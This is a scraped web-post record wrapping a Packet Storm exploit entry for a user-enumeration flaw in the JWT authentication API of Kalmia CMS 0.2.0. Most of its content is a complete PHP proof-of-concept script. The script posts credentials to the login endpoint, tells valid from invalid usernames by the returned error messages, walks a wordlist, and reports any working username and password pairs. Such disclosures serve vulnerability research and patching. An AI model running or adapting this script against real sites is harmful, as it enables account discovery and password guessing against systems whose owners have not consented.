{“lastseen”:”2025-12-18T16:41:38″,”description”:”Proof of concept exploit that demonstrates a user enumeration vulnerability via the JWT authentication API on Kalmia CMS version 0.2.0…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Kalmia CMS 0.2.0 User Enumeration”,”source”:””,”references”:””,”id”:”PACKETSTORM:213002″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-65899″,”CVE-2025-65900″],”sourceData”:”=============================================================================================================================================\\n | # Title : Kalmia CMS 0.2.0 User Enumeration via JWT Auth API |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/kalmia.difuse.io\/doc\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212443\/ \\u0026\\t\\tCVE-2025-65899\\n \\n [+] Summary : The JWT authentication endpoint leaks whether a user exists based on the returned JSON \\”message\\”. \\n \\n [+] The API returns:\\n \\n \\”user_not_found\\” =\\u003e invalid username\\n \\”invalid_password\\” =\\u003e valid username but wrong password\\n \\”200 OK\\” =\\u003e valid credentials\\n \\n [+] This PoC performs username brute-force enumeration using this flaw.\\n \\n Usage:\\n php poc.php URL -u user -p pass\\n php poc.php URL -w wordlist.txt -p pass\\n \\n ====================================================================\\n Saving:\\n Save the PHP PoC as: poc.php\\n \\n Running:\\n php poc.php http:\/\/target:2727 -u admin -p 123456\\n php poc.php http:\/\/target:2727 -w users.txt -p 123456\\n \\n [+] POC : \\n \\n \\u003c?php\\n \/*\\n * Kalmia CMS v0.2.0 \u2013 User Enumeration \u2013 CVE\u20112025\u201165900\\n * by Indoushka\\n *\/\\n \\n if ($argc \\u003c 2) {\\n die(\\”Usage:\\n php $argv[0] URL -u user -p pass\\n php $argv[0] URL -w wordlist.txt -p pass\\\\n\\”);\\n }\\n \\n $url = $argv[1];\\n $username = null;\\n $password = null;\\n $wordlist = null;\\n \\n for ($i = 2; $i \\u003c $argc; $i++) {\\n if ($argv[$i] === \\”-u\\” \\u0026\\u0026 isset($argv[$i+1])) $username = $argv[++$i];\\n elseif ($argv[$i] === \\”-p\\” \\u0026\\u0026 isset($argv[$i+1])) $password = $argv[++$i];\\n elseif ($argv[$i] === \\”-w\\” \\u0026\\u0026 isset($argv[$i+1])) $wordlist = $argv[++$i];\\n }\\n \\n function http_post($full_url, $payload) {\\n $opts = [\\n \\”http\\” =\\u003e [\\n \\”method\\” =\\u003e \\”POST\\”,\\n \\”header\\” =\\u003e\\n \\”Content-Type: application\/json\\\\r\\\\n\\” .\\n \\”User-Agent: Mozilla\/5.0\\\\r\\\\n\\”,\\n \\”content\\” =\\u003e json_encode($payload),\\n \\”timeout\\” =\\u003e 30\\n ]\\n ];\\n return @file_get_contents($full_url, false, stream_context_create($opts));\\n }\\n \\n function checkCredentials($base, $user, $pass) {\\n $endpoint = \\”\/kal-api\/auth\/jwt\/create\\”;\\n $full_url = rtrim($base, \\”\/\\”) . $endpoint;\\n \\n $response = http_post($full_url, [\\n \\”username\\” =\\u003e $user,\\n \\”password\\” =\\u003e $pass\\n ]);\\n \\n if ($response === false) return \\”connection_error\\”;\\n \\n $json = json_decode($response, true);\\n if (!is_array($json)) return \\”invalid_response\\”;\\n \\n if (isset($json[\\”refresh\\”])) return \\”valid_credentials\\”;\\n if (($json[\\”message\\”] ?? \\”\\”) === \\”user_not_found\\”) return \\”user_not_found\\”;\\n if (($json[\\”message\\”] ?? \\”\\”) === \\”invalid_password\\”) return \\”invalid_password\\”;\\n \\n return \\”unknown_error\\”;\\n }\\n \\n echo \\”\\\\n===============================================================\\\\n\\”;\\n echo \\”[*] Target Base: $url\\\\n\\”;\\n echo \\”===============================================================\\\\n\\”;\\n \\n if ($username \\u0026\\u0026 $password) {\\n $result = checkCredentials($url, $username, $password);\\n if ($result === \\”valid_credentials\\”)\\n echo \\”[+] Valid Credentials: $username:$password\\\\n\\”;\\n elseif ($result === \\”invalid_password\\”)\\n echo \\”[+] Valid User: $username\\\\n\\”;\\n elseif ($result === \\”user_not_found\\”)\\n echo \\”[-] User does not exist: $username\\\\n\\”;\\n else\\n echo \\”[-] Error: $result\\\\n\\”;\\n \\n exit;\\n }\\n \\n if ($wordlist \\u0026\\u0026 $password) {\\n if (!file_exists($wordlist))\\n die(\\”Wordlist file not found: $wordlist\\\\n\\”);\\n \\n $users = file($wordlist, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n echo \\”[*] Starting enumeration for \\” . count($users) . \\” users…\\\\n\\\\n\\”;\\n \\n $valid_users = [];\\n foreach ($users as $u) {\\n $result = checkCredentials($url, $u, $password);\\n \\n if ($result === \\”invalid_password\\”) {\\n echo \\”[+] Valid user found: $u\\\\n\\”;\\n $valid_users[] = $u;\\n } elseif ($result === \\”valid_credentials\\”) {\\n echo \\”[+] Valid credentials: $u:$password\\\\n\\”;\\n }\\n }\\n \\n if ($valid_users)\\n echo \\”\\\\n[+] Summary \u2013 Valid users: \\” . implode(\\”, \\”, $valid_users) . \\”\\\\n\\”;\\n else\\n echo \\”[-] No valid users found\\\\n\\”;\\n \\n exit;\\n }\\n \\n echo \\”Error: Missing parameters.\\\\n\\”;\\n exit;\\n ?\\u003e\\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213002″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213002\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-18T16:41:38″,”description”:”Proof of concept exploit that demonstrates a user enumeration vulnerability via the JWT authentication API on Kalmia CMS version 0.2.0…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Kalmia CMS 0.2.0 User Enumeration”,”source”:””,”references”:””,”id”:”PACKETSTORM:213002″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-65899″,”CVE-2025-65900″],”sourceData”:”=============================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-31888","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n